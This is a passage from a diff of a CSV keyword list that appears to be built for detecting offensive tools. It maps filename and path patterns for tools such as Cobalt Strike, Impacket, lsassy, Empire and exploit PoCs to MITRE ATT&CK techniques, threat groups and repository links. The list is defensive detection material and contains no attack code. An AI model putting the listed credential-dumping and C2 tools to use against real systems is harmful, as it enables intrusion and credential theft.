By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
 "*/logs/*/becon_*.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z"
-"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
-"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*/loot_default/*.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*/loot_default/*.ps1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*/loot_default/*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet 
penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*/loot_finder*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
 "*/lpBunny/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z"
-"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*/lsass.DMP*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
 "*/lsass/beacon.h*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
-"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
-"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
-"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z"
+"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","1","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*/LsassSilentProcessExit.git*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*/lsassy*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z"
+"*/lsassy_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/lucksec/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/lucksec/CVE-2022-0847","1","1","N/A","N/A","1","1","4","2022-03-08T01:50:39Z","2022-03-08T01:17:09Z"
 "*/lu-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/luijait/arpspoofing*","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","1","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z"
@@ -4253,138 +4280,145 @@
 "*/MaccaroniC2*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z"
 "*/MacroMeter*","offensive_tool_keyword","MacroMeter","VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript","T1027 - T1059 - T1564 - T1071","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/MacroMeter","1","0","N/A","N/A","1","62","31","2018-04-23T09:14:49Z","2017-05-16T20:04:41Z"
 "*/MacroPatterns.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z"
-"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/Macro-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
 "*/MacroWord_Payload/macro.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - 
TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
 "*/magnitude.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
 "*/MailRaider.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
-"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. 
etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
+"*/MailRaider.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/MailSniper/*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z"
 "*/main/cve-2022-0847.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z"
 "*/main/exploit.js","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z"
 "*/main/exploit.pdf","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","250","57","2023-02-27T04:51:20Z","2023-01-30T12:57:48Z"
 "*/MaliciousMacroMSBuild*","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","1","N/A","8","5","488","117","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z"
-"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z"
+"*/malleable-c2*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
